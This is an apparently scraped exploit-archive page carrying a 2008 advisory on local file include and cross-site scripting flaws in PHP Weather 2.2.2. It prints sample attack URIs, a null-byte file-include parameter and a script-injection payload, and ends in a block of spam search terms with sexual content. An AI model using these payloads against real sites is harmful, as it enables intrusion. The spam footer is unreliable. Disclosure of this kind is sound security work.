about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHP Weather Local File Include and Cross Site Scripting Vulnerabilities


Title PHP Weather Local File Include and Cross Site Scripting Vulnerabilities
Published 2008-12-14-12:00AM
Updated 2008-12-18-09:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  ahmadbady
Vulnerable  PHP Weather PHP Weather 2.2.2
Not Vulnerable  
Code  Attackers can exploit these issues via a browser.The following example URIs are available:For the local file-include issue:http://www.example.com/path/test.php?metar=()&language=[Lfi]%00For the cross-site scripting issue:http://www.example.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 10:48:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.indone www.836.gz blog.qiouy libcompile SEXTUBE.CO girlsex *** vidios sexteen profile.8j news for c profile.8j +ynhub http:/www. gols do sa freesexvid gols do sa RhinoSoft actress sn www.zhichi Pornoklipo sexteen Flog nayanathar Arabe porn m...2Falat Hqtube flash medi jianfei.go www.pentho www.7xjk.c maxcpm.inf sexcity www.52ping ip board 2 IMAIL expl m...2Falat www.trish modules%25 rituparna www.worldp maxcpm.inf www.videos www.aiggmm news for c namatasex welpeper.h flavvia vi Hot sexi p Www.sexcli Soper.sex1